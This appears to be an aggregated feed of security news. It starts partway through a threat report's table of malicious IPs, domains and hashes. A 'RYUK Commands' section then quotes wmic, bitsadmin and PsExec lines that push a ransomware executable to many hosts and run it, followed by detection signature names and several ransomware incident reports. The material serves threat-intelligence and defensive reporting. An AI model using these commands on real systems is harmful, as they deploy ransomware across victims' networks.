1134a6f276f4297a083fc2a605e24f70

10/16/20

45.147.230.140:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

2150045f476508f89d9a322561b28ff9

10/16/20

45.147.230.133:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

f4ddc4562e5001ac8fdf0b7de079b344

10/19/20

74.118.138.137:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

75fb6789ec03961c869b52336fa4e085

10/19/20

74.118.138.115:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

9f5e845091015b533b59fe5e8536a435

10/19/20

108.177.235.53:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

4b78eaa4f2748df27ebf6655ea8a7fe9

10/19/20

74.118.138.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

bcccda483753c82e62482c55bc743c16

10/21/20

45.153.241.1:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

672c66dd4bb62047bb836bd89d2e1a65

10/21/20

45.153.240.240:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

6825409698a326cc319ca40cd85a602e

10/21/20

45.153.240.194:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

7f9be0302da88e0d322e5701d52d4128

10/21/20

45.153.240.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

2c6a0856d1a75b303337ac0807429e88

10/21/20

45.153.240.136:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

6559dbf8c47383b7b493500d7ed76f6a

10/23/20

45.153.240.157:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

7bd044e0a6689ef29ce23e3ccb0736a3

10/23/20

45.153.240.178:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

9859a8336d097bc30e6e5c7a8279f18e

10/23/20

45.153.240.220:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

43fb2c153b59bf46cf6f67e0ddd6ef51

10/23/20

45.153.240.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

22bafb30cc3adaa84fef747d589ab235

10/23/20

45.153.241.134:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

31e87ba0c90bb38b986af297e4905e00

10/23/20

45.153.241.138:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

f8a14846b7da416b14303bced5a6418f

10/23/20

45.153.241.146:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

01abdaf870d859f9c1fd76f0b0328a2b

10/23/20

45.153.241.153:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

c2eaf144e21f3aef5fe4b1502d318ba6

10/23/20

45.153.241.158:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

de54af391602f3deea19cd5e1e912316

10/23/20

45.153.241.167:443

C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

5f6fa19ffe5735ff81b0e7981a864dc8

10/23/20

45.147.231.222:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

ff54a7e6f51a850ef1d744d06d8e6caa

10/23/20

45.153.241.141:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

4cda9d0bece4f6156a80967298455bd5

10/26/20

74.118.138.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

e317485d700bf5e8cb8eea1ec6a72a1a

10/26/20

108.62.12.12:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

e0022cbf0dd5aa597fee73e79d2b5023

10/26/20

108.62.12.121:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

44e7347a522b22cdf5de658a4237ce58

10/26/20

172.241.27.65:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

cd3e51ee538610879d6fa77fa281bc6f

10/26/20

172.241.27.68:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

04b6aec529b3656040a68e17afdabfa4

10/26/20

172.241.27.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

200c25c2b93203392e1acf5d975d6544

10/26/20

45.153.241.139:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

9d7c52c79f3825baf97d1318bae3ebe2

10/27/20

45.153.241.14:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

5bae28b0d0e969af2c0eda21abe91f35

10/28/20

190.211.254.154:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

a1e62e7e547532831d0dd07832f61f54

10/28/20

81.17.28.70:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

67c7c75d396988ba7d6cd36f35def3e4

10/28/20

81.17.28.105:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

880e59b44e7175e62d75128accedb221

10/28/20

179.43.160.205:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

cdea09a43bef7f1679e9cd1bbeb4b657

10/28/20

179.43.158.171:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

512c6e39bf03a4240f5a2d32ee710ce5

10/28/20

179.43.133.44:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

87f3698c743f8a1296babf9fbebafa9f

10/28/20

179.43.128.5:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

6df66077378c5943453b36bd3a1ed105

10/28/20

179.43.128.3:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

9706fd787a32a7e94915f91124de3ad3

10/28/20

81.17.28.122:443

C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

0e1b0266de2b5eaf427f5915086b4d7c

RYUK Commands

start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

Detecting the Techniques

FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

Platform

Signature Name

Endpoint Security

  • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
  • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
  • POTENTIAL KEGTAP MALWARE ACTIVITY (BACKDOOR)
  • SINGLEMALT (DOWNLOADER)
  • STILLBOT (BACKDOOR)
  • WINEKEY (DOWNLOADER)
  • CORKBOT (BACKDOOR)

Network Security and Email Security

  • Downloader.Win.KEGTAP
  • Trojan.KEGTAP
  • APTFIN.Backdoor.Win.BEERBOT
  • APTFIN.Downloader.Win.SINGLEMALT
  • APTFIN.Backdoor.Win.STILLBOT
  • APTFIN.Downloader.Win.WINEKEY
  • APTFIN.Backdoor.Win.CORKBOT
  • FE_Downloader_Win64_KEGTAP
  • FE_APTFIN_Backdoor_Win32_BEERBOT
  • FE_APTFIN_Backdoor_Win_BEERBOT
  • FE_APTFIN_Downloader_Win32_SINGLEMALT
  • FE_APTFIN_Downloader_Win64_SINGLEMALT
  • FE_APTFIN_Backdoor_Win_STILLBOT
  • FE_APTFIN_Downloader_Win_WINEKEY
  • FE_APTFIN_Backdoor_Win_CORKBOT

More Hospitals Hit by Growing Wave of Ransomware Attacks

Hospitals in New York and Oregon were targeted on Tuesday by threat actors who crippled systems and forced ambulances with sick patients to be rerouted, in some cases.

Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo

In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents — including schematics of client bank vaults and surveillance systems.

The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually.

Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company’s internal network remotely.

Five months later, Gunnebo disclosed it had suffered a cyber attack targeting its IT systems that forced the shutdown of internal servers. Nevertheless, the company said its quick reaction prevented the intruders from spreading the ransomware throughout its systems, and that the overall lasting impact from the incident was minimal.

Earlier this week, Swedish news agency Dagens Nyheter confirmed that hackers recently published online at least 38,000 documents stolen from Gunnebo’s network. Linus Larsson, the journalist who broke the story, says the hacked material was uploaded to a public server during the second half of September, and it is not known how many people may have gained access to it.

Larsson quotes Gunnebo CEO Stefan Syrén saying the company never considered paying the ransom the attackers demanded in exchange for not publishing its internal documents. What’s more, Syrén seemed to downplay the severity of the exposure.

“I understand that you can see drawings as sensitive, but we do not consider them as sensitive automatically,” the CEO reportedly said. “When it comes to cameras in a public environment, for example, half the point is that they should be visible, therefore a drawing with camera placements in itself is not very sensitive.”

It remains unclear whether the stolen RDP credentials were a factor in this incident. But the password to the Gunnebo RDP account — “password01” — suggests the security of its IT systems may have been lacking in other areas as well.

After this author posted a request for contact from Gunnebo on Twitter, KrebsOnSecurity heard from Rasmus Jansson, an account manager at Gunnebo who specializes in protecting client systems from electromagnetic pulse (EMP) attacks or disruption, short bursts of energy that can damage electrical equipment.

Jansson said he relayed the stolen credentials to the company’s IT specialists, but that he does not know what actions the company took in response. Reached by phone today, Jansson said he quit the company in August, right around the time Gunnebo disclosed the thwarted ransomware attack. He declined to comment on the particulars of the extortion incident.

Ransomware attackers often spend weeks or months inside of a target’s network before attempting to deploy malware across the network that encrypts servers and desktop systems unless and until a ransom demand is met.

That’s because gaining the initial foothold is rarely the difficult part of the attack. In fact, many ransomware groups now have such an embarrassment of riches in this regard that they’ve taken to hiring external penetration testers to carry out the grunt work of escalating that initial foothold into complete control over the victim’s network and any data backup systems  — a process that can be hugely time consuming.

But prior to launching their ransomware, it has become common practice for these extortionists to offload as much sensitive and proprietary data as possible. In some cases, this allows the intruders to profit even if their malware somehow fails to do its job. In other instances, victims are asked to pay two extortion demands: One for a digital key to unlock encrypted systems, and another in exchange for a promise not to publish, auction or otherwise trade any stolen data.

While it may seem ironic when a physical security firm ends up having all of its secrets published online, the reality is that some of the biggest targets of ransomware groups continue to be companies which may not consider cybersecurity or information systems as their primary concern or business — regardless of how much may be riding on that technology.

Indeed, companies that persist in viewing cyber and physical security as somehow separate seem to be among the favorite targets of ransomware actors. Last week, a Russian journalist published a video on Youtube claiming to be an interview with the cybercriminals behind the REvil/Sodinokibi ransomware strain, which is the handiwork of a particularly aggressive criminal group that’s been behind some of the biggest and most costly ransom attacks in recent years.

In the video, the REvil representative stated that the most desirable targets for the group were agriculture companies, manufacturers, insurance firms, and law firms. The REvil actor claimed that on average roughly one in three of its victims agrees to pay an extortion fee.

Mark Arena, CEO of cybersecurity threat intelligence firm Intel 471, said while it might be tempting to believe that firms which specialize in information security typically have better cybersecurity practices than physical security firms, few organizations have a deep understanding of their adversaries.

Arena said this is a particularly acute shortcoming with many managed service providers (MSPs), companies that provide outsourced security services to hundreds or thousands of clients who might not otherwise be able to afford to hire cybersecurity professionals.

“The harsh and unfortunate reality is the security of a number of security companies is shit,” Arena said. “Most companies tend to have a lack of ongoing and up to date understanding of the threat actors they face.”

Enel Group suffered the second ransomware attack this year

Multinational energy company Enel Group has been hit by Netwalker ransomware operators that are asking a $14 million ransom.

Systems at the multinational energy company Enel Group has been infected with Netwalker ransomware, it is the second ransomware attack suffered by the energy giant this year. Netwalker ransomware operators are asking a $14 million ransom for the decryption key, the hackers claim to have stolen several terabytes from the company and threaten to leak them if the ransom will be not paid.

Enel S.p.A., or the Enel Group, is an Italian multinational energy company that is active in the sectors of electricity generation and distribution, as well as in the distribution of natural gas.

The company has more than 61 million customers in 40 countries, it ranks 87 in Fortune Global 500, with $90 billion in revenues in 2019.

In June, Enel was hit by Snake ransomware, but the attack was quickly contained and the malware was not able to spread within its network.

The news of a possible ransomware attack against Enel Group was reported to BleepingComputer by a researcher on October 19.

The researcher shared with BleepingComputer a Netwalker ransom note that appeared to be used in the attack on Enel Group.

Netwalker Enel Group ransom-note
Source Bleeping Computer

BleepingComputer attempted to notify Enel Group last week without success. A few days later, Netwalker announced the leak of the company data through their support chat.

Enel never replied to the message of the ransomware operators, for this reason, the attackers started leaking a portion of the stolen data as proof of the data breach.

The operators are asking $14 million worth of Bitcoin (roughly 1234.02380000 BTC).

ENEL group netwalker-page-for-enel
Source Bleeping Computer

Today, the Netwalker ransomware operators added Enel Group to their data leak site and some screenshots of unencrypted files stolen from the company.

The Italian cyber security firm TG soft publicly shared the news of the attack in a tweet:

The hackers stole about 5 terabytes of documents from the company and announced that they will “analyze every file for interesting things” and publish it on their leak site.

At the time of publishing this post, the company have yet to confirm the incident, let’s remember that the company conduct will have to be in compliance with the current EU privacy legislation GDPR.

Pierluigi Paganini

(SecurityAffairs – hacking, ENEL Group)

The post Enel Group suffered the second ransomware attack this year appeared first on Security Affairs.

WannaCry Ransomware Explained

Ransomware has become one of the main cyber threats that can have devastating effects on organizations, resulting in financial damage, corporate instability, and reputational harm. This type of malware uses complex encryption algorithms which lock up all files on a machine unless a decryption key is used to retrieve the data. A ransom message appears […]

The post WannaCry Ransomware Explained appeared first on Heimdal Security Blog.

The Nastiest Malware of 2020

Reading Time: ~ 4 min.

For the third year running, we’ve examined the year’s biggest cyber threats and ranked them to determine which ones are the absolute worst. Somewhat unsurprisingly, phishing and RDP-related breaches remain the top methods we’ve seen cybercriminals using to launch their attacks. Additionally, while new examples of malware and cybercriminal tactics crop up each day, plenty of the same old players, such as ransomware, continue to get upgrades and dominate the scene.

For example, a new trend in ransomware this year is the addition of a data leak/auction website, where criminals will reveal or auction off data they’ve stolen in a ransomware attack if the victim refuses to pay. The threat of data exposure creates a further incentive for victims to pay ransoms, lest they face embarrassing damage to their personal or professional reputations, not to mention hefty fines from privacy-related regulatory bodies like GDPR.

But the main trend we’ll highlight here is that of modularity. Today’s malicious actors have adopted a more modular malware methodology, in which they combine attack methods and mix-and-match tactics to ensure maximum damage and/or financial success.

Here are a few of nastiest characters and a breakdown of how they can work together.

  • Emotet botnet + TrickBot Trojan + Conti/Ryuk ransomware
    There’s a reason Emotet has topped our list for 3 years in a row. Even though it’s not a ransomware payload itself, it’s the botnet that is responsible for the most ransomware infections, making it pretty darn nasty. It’s often seen with TrickBot, Dridex, QakBot, Conti/Ryuk, BitPaymer and REvil.

    Here’s how an attack might start with Emotet and end with ransomware. The botnet is used in a malicious spam campaign. An unwitting employee at a company receives the spam email, accidentally downloads the malicious payload. With its foot in the door, Emotet drops TrickBot, an info-stealing Trojan. TrickBot spreads laterally through the network like a worm, infecting every machine it encounters. It “listens” for login credentials (and steals them), aiming to get domain-level access. From there, attackers can perform recon on the network, disable protections, and drop Conti/Ryuk ransomware at their leisure.
  • Ursnif Trojan + IcedID Trojan + Maze ransomware
    Ursnif, also known as Gozi or Dreambot, is a banking Trojan that has resurfaced after being mostly dormant for a few years. In an attack featuring this troublesome trio, Ursnif might land on a machine via a malicious spam email, botnet, or even TrickBot, and then drop the IcedID Trojan to improve the attackers’ chances of getting the credentials or intel they want. (Interestingly, IcedID has been upgraded to use steganographic payloads. Steganography in malware refers to concealing malicious code inside another file, message, image or video.) Let’s say the Trojans obtain the RDP credentials for the network they’ve infected. In this scenario, the attackers can now sell those credentials to other bad actors and/or deploy ransomware, typically Maze. (Fun fact: Maze is believed to have “pioneered” the data leak/auction website trend.)
  • Dridex/Emotet malspam + Dridex Trojan + BitPaymer/DoppelPaymer ransomware

Like TrickBot, Dridex is another very popular banking/info-stealing Trojan that’s been around for years. When Dridex is in play, it is either dropped via Emotet or its authors’ own malicious spam campaign. Also like TrickBot, Dridex spreads laterally, listens for credentials, and typically deploys ransomware like BitPaymer/DoppelPaymer.

As you can see, there are a variety of ways the attacks can be carried out, but the end goal is the more or less the same. The diverse means just help ensure the likelihood of success.

The characters mentioned above are, by no means, the only names on our list. Here are some of the other notable contenders for Nastiest Malware.

  • Sodinokibi/REvil/GandCrab ransomware – all iterations of the same ransomware, this ransomware as a service (RaaS) payload is available for anyone to use, as long as the authors get a cut of any successful ransoms.
  • CrySiS/Dharma/Phobos ransomware – also RaaS payloads, these are almost exclusively deployed using compromised RDP credentials that are either brute-forced or easily guessed.
  • Valak – a potent multi-functional malware distribution tool. Not only does it commonly distribute nasty malware such as IcedID and Ursnif, but it also has information stealing functionalities built directly into the initial infection.
  • QakBot – an info-stealing Trojan often dropped by Emotet or its own malspam campaigns with links to compromised websites. It’s similar to TrickBot and Dridex and may be paired with ProLock ransomware.

Combine protections to combat combined attacks.

If businesses want to stay safe, they need to implement multiple layers of protection against these types of layered attacks. Here are some tips from our experts.

  • Lock down RDP. Security analyst Tyler Moffitt says unsecured RDP has risen over 40% since the COVID-19 pandemic began because more businesses are enabling their workforce to work remotely. Unfortunately, many are not doing so securely. He recommends businesses use RDP solutions that encrypt the data and use multi-factor authentication to increase security when remoting into other machines.
  • Educate end users about phishing. Principal product manager Phil Karcher points out that many of the attack scenarios listed above could be prevented with stronger phishing/spam awareness among end users. He recommends running regular security training and phishing simulations with useful feedback. He also says it’s critical that employees know when and how to report a suspicious message.
  • Install reputable cybersecurity software. Security intelligence director Grayson Milbourne can’t stress enough the importance of choosing a solution that uses real-time threat intelligence and offers multi-layered shielding to detect and prevent multiple kinds of attacks at different attack stages.
  • Set up a strong backup and disaster recovery plan. VP of product management Jamie Zajac says that, particularly with a mostly or entirely remote workforce, businesses can’t afford not to have a strong backup. She strongly recommends regular backup testing and setting alerts and regular reporting so admins can easily see if something’s amiss.

Discover more about the 2020’s Nastiest Malware on the Webroot Community.

The post The Nastiest Malware of 2020 appeared first on Webroot Blog.

Organizations struggle to obtain quality threat data to guide key security decisions

Organizations are often forced to make critical security decisions based on threat data that is not accurate, relevant and fresh, a Neustar report reveals. Just 60% of cybersecurity professionals surveyed indicate that the threat data they receive is both timely and actionable, and only 29% say the data they receive is both extremely accurate and relevant to the threats their organization is facing at that moment. Few orgs basing decisions on near real-time data With … More

The post Organizations struggle to obtain quality threat data to guide key security decisions appeared first on Help Net Security.

Ransomware attack disabled Georgia County Election database

A ransomware attack recently hit Georgia county government and reportedly disabled a database used to verify voter signatures.

A ransomware attack hit a Georgia county government early this month and disabled a database used to verify voter signatures in the authentication of absentee ballots. It is a common process to validate absentee ballots sent by mail by analyzing signatures.

The media pointed out that this is the first reported case of a ransomware attack against a system used in the incoming 2020 Presidential election.

Ransomware attacks could have a dramatic impact on the elections, they could disrupt voting systems and raise doubts about the validity of the vote.

The attack took place on October 7, it hit Hall County, in the northern part of the state and it disabled the county’s voter signature database.

“One of the databases the county uses to verify voter signatures on absentee ballots is not working after some county network outages due to a ransomware attack on Oct. 7.” reported the Gainesville Times. “Registration Coordinator Kay Wimpye with the county elections office said employees can still verify voter signatures by manually pulling hard copies of voter registration cards, which is more time-consuming. Most voter signatures can be verified using a state database that has been unaffected by the outages, she said.”

The media reported that the Hall County attack was carried out by Doppelpaymer ransomware operators that also leaked stolen data on their dark web leak site to force the organization to pay the ransom.

The county website published an update to announce that the attack did not impact the voting process for citizens, a situation that is differed from the scenario reported by the Times.

Pierluigi Paganini

(SecurityAffairs – hacking, Georgia county)

The post Ransomware attack disabled Georgia County Election database appeared first on Security Affairs.

Is the Abaddon RAT the first malware using Discord as C&C?

Abaddon is the first RAT that uses the freeware instant messaging and VoIP app and digital distribution platform Discord as a command & control server.

Researchers from MalwareHunterTeam have spotted a new piece of remote access trojan (RAT) dubbed ‘Abaddon’ that is likely the first malware using the Discord platform as command and control. The Abaddon malware connects to the Discord command and control server to check for new commands to execute.

Experts also warn that the author of the malware also developed a malware feature.

In the past, other threat actors already abused the Discord platform for different purposes, such as using it as a stolen data drop.

“In the past, we have reported on how threat actors use Discord as a stolen data drop or have created malware that modifies the Discord client to have it steal credentials and other information.” reported Bleeping Computer that first reported the news.

Abaddon implements data-stealing feature, it was designed to steal multiple data from the infected host, including Chrome cookies, saved credit cards, and credentials, Steam credentials, Discord tokens and MFA information.

The malware also collects system information such as country, IP address, and hardware information.

According to Bleeping Computer the malware supports the following commands:

  • Steal a file or entire directories from the computer
  • Get a list of drives
  • Open a reverse shell that allows the attacker to execute commands on the infected PC.
  • Launch in-development ransomware (more later on this).
  • Send back any collected information and clear the existing collection of data.

The malicious code connects to the Command & Control every ten seconds for new tasks to execute.

Experts pointed out that the malware also implements the commands to encrypt files of the infected system and decrypt them.

The ransomware feature appears to be under development.

Pierluigi Paganini

(SecurityAffairs – hacking, Abaddon)

The post Is the Abaddon RAT the first malware using Discord as C&C? appeared first on Security Affairs.

Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware

The systems at the US-based ski and golf resort operator were infected with the WastedLocker ransomware, the incident impacted reservation systems.

Boyne Resorts is a collection of mountain and lakeside resorts, ski areas, and attractions spanning from British Columbia to Maine.  The company owns and operates eleven properties and an outdoor lifestyle equipment/apparel retail division with stores in cities throughout Michigan.  An industry leader in multiple U.S. regions, operations include snowsports and year-round mountain recreation, golf, an indoor waterpark, spas, food and beverage, lodging and real estate development.

Boyne Resorts was the victim of WastedLocker ransomware attack, the incident has impacted reservation systems.

According to BleepingComputer, the ransomware initially breached the corporate offices and then moved laterally targeting the IT systems of the resorts they operate. As result of the attack the company was forced to shut down portions of its network to prevent the ransomware from spreading.

Customers of the company were not able to make reservations at the resorts operated by the company. .

The ransomware encrypted files and renamed their filenames by adding the “.easy2lock” extension, this extension was previously associated with recent WastedLocker ransomware infections.

In July, Smartwatch and wearable device maker Garmin had to shut down some of its connected services and call centers following a WastedLocker Ransomware attack.

In June, security experts from Symantec reported that at least 31 organizations in the United States have been targeted with the recently discovered WastedLocker ransomware.

Researchers from the NCC Group’s report and later Symantec confirmed that malware was developed by the Russian cybercrime crew known as Evil Corp, which was behind the Dridex Trojan, and multiple ransomware like Locky , Bart, Jaff, and BitPaymer.

Most of the victims belong to the manufacturing industry, followed by IT and media and telecommunications sectors.

This group has been active since at least 2007, in December 2019, the U.S. Treasury Department imposed sanctioned on Evil Corp for causing more than $100 million in financial damages.

The U.S. Department of Justice (DoJ) has charged Russian citizens Maksim V. (32) and Igor Turashev (38) for distributing the infamous Dridex banking Trojan, and for their involvement in international bank fraud and computer hacking schemes.

Ransom payments to WastedLocker is not allowed by US authorities, this means that Boyne Resorts could face severe sanctions if it will pay the ransom.

Pierluigi Paganini

(SecurityAffairs – hacking, WastedLocker)

The post Boyne Resorts ski and golf resort operator hit with WastedLocker ransomware appeared first on Security Affairs.

Sopra Steria hit by the Ryuk ransomware gang

French IT outsourcer Sopra Steria hit by ‘cyberattack’, Ryuk ransomware suspected

French IT outsourcer Sopra Steria has been hit by a ransomware attack, while the company did not reveal the family of malware that infected its systems, local media speculate the involvement of the Ryuk ransomware.

“A cyber attack was detected on the Sopra Steria computer network on the evening of October 20. Security measures have been taken to limit the risk of propagation.” reads the press release published by the company. “The Group’s teams are fully mobilized to ensure a return to normal as quickly as possible and everything is done to ensure business continuity. Sopra Steria is in close contact with its customers and partners as well as with the competent authorities.”

The European IT firm has 46,000 employees operating in 25 countries worldwide. It provides a wide range of IT services, including software development and consulting.

“According to our sources, the incident started to spread during the course of last night. The Active Directory infrastructure would be affected. And part of the information system would have been encrypted.” reported the website LeMagit. “Two sources tell us that the ransomware involved is none other than Ryuk. Surprise, researcher  JamesWT_MHT  found on VirusTotal a copy of an executable which two sources have confirmed to us is used internally at ESN for the generation of email signatures.”

French authorities are investigating the incident.

Sopra Steria is a member of France’s Cyber Campus, a French initiative to spread cybersecurity awareness, training, and product sales.

The Ryuk ransomware operators were very active early this year, in March they targeted hospitals even as these organizations are involved in the fight against the Coronavirus pandemic.

In September, the Universal Health Services (UHS) healthcare providers has reportedly shut down systems at healthcare facilities after a Ryuk ransomware attack.

In March, the City of Durham shut down its network after Ryuk Ransomware attack.

A few days before, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, has been hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Pierluigi Paganini

(SecurityAffairs – hacking, Sopra Steria)

The post Sopra Steria hit by the Ryuk ransomware gang appeared first on Security Affairs.

Sopra Steria hit by cyber attack. IT services group suspected of falling victim to ransomware

European IT services group Sopra Steria has been hit by a cyber attack. Which would be unfortunate for any business at the best of times, but is possibly even more galling for a firm like Sopra Steria which has a specialist cybersecurity branch which claims to help customers “protect sensitive information, and prevent costly data breaches.”

Exploring the prolific threats influencing the cyber landscape

Some of the world’s most skilled nation-state cyber adversaries and notorious ransomware gangs are deploying an arsenal of new open-sourced tools, actively exploiting corporate email systems and using online extortion to scare victims into paying ransoms, according to a report from Accenture. The report examines the tactics, techniques and procedures employed by some of the most sophisticated cyber adversaries and explores how cyber incidents could evolve over the next year. “Since COVID-19 radically shifted the … More

The post Exploring the prolific threats influencing the cyber landscape appeared first on Help Net Security.

How tech trends and risks shape organizations’ data protection strategy

Trustwave released a report which depicts how technology trends, compromise risks and regulations are shaping how organizations’ data is stored and protected. Data protection strategy The report is based on a recent survey of 966 full-time IT professionals who are cybersecurity decision makers or security influencers within their organizations. Over 75% of respondents work in organizations with over 500 employees in key geographic regions including the U.S., U.K., Australia and Singapore. “Data drives the global … More

The post How tech trends and risks shape organizations’ data protection strategy appeared first on Help Net Security.

Smashing Security podcast #201: Robin Hood, Flippy, and the web ad bubble

The Darkside ransomware gang thinks it's a modern-day Robin Hood when it donates extorted Bitcoins to charity, the micro-targeted ad industry could pop like a bubble, and would you trust a burger-flipping robot? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Tim Hwang.

Montréal Public Transport Agency Discloses Ransomware Attack

A public transport agency operating in Montréal announced that a ransomware attack had affected its website and other systems. The Société de transport de Montréal (STM) disclosed the infection on a web page it created to keep customers updated about its services while its main site remains offline: Since the afternoon of October 19, the […]… Read More

The post Montréal Public Transport Agency Discloses Ransomware Attack appeared first on The State of Security.

Ransomware Gang Donated Part of Ransom Demands to Charities

A budding ransomware group donated part of the ransom demands that it had previously extorted from its victims to two charities. On October 13, the Darkside ransomware group announced the donations in a blog post on its dark web portal. As quoted by ZDNet: As we said in the first press release – we are […]… Read More

The post Ransomware Gang Donated Part of Ransom Demands to Charities appeared first on The State of Security.

Nefilim ransomware gang published Luxottica data on its leak site

The Nefilim ransomware operators have posted a long list of files that appear to belong to Italian eyewear and eyecare giant Luxottica.

Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. Its best known brands are Ray-Ban, Persol, and Oakley. Luxottica also makes sunglasses and prescription frames for designer brands such as Chanel, Prada, Giorgio Armani, Burberry, Versace, Dolce and Gabbana, Miu Miu, and Tory Burch.

Luxottica employs over 80,000 people and generated 9.4 billion in revenue for 2019.

On September 18, the company was hit by a cyberattack, some of the web sites operated by the company were not reachable, including Ray-Ban, Sunglass Hut, LensCrafters, EyeMed, and Pearle Vision.

Italian media outlets reported that the operations at the plants of Luxottica in Agordo and Sedico (Italy) were disrupted due to a computer system failure. Union sources confirmed that the personnel at the plants received an SMS in which they were notified that “the second workshift of today 21 September is suspended” due to “serious IT problems”.

BleepingComputer website, citing the security firm Bad Packets, speculates that the Italian was using a Citrix ADX controller device vulnerable to the critical CVE-2019-19781 vulnerability in Citrix devices.

At the time Luxottica has yet to release any official statement on the attack.

Security experts believe that threat actor exploited the above flaw to infect the systems at the company with ransomware.

Now we have more information about the incident, that seems to be the result of a ransomware attack.

The popular Italian cyber security expert Odysseus first revealed on the web site “Difesa e Sicurezza” that the Nefilim ransomware operators have posted a long list of files that appear to belong to Luxottica.

The huge trove of files appears to be related to the personnel office and finance departments.

Luxottica

The analysis of the leaked files revealed that they contain confidential information regarding the recruitment process, professional resumes, and info about the internal structures of the Group’s human resource department.

The exposed financial data includes budgets, marketing forecast analysis, and other sensitive data.

Nefilim ransomware operators also published a message which accuses Luxottica of having failed the properly manage the attack.

In the past months, the number of ransomware attacks surged, numerous ransomware gangs made the headlines targeting organizations worldwide and threating the victims of releasing the stolen data if the ransom was not paid.

“Extortion it’s the “new deal” of the cybercrime: now, more than in the past, companies can’t “hide” the cyber attack anymore. Now it becomes mandatory “manage” the breach from the communication perspective: dissembling is useless and harmful.” explained Odysseus. “And again, defend the companies from the cyber attacks becomes even more strategic: data leaks damages can generate tremendus amount of costs for companies worldwide.”

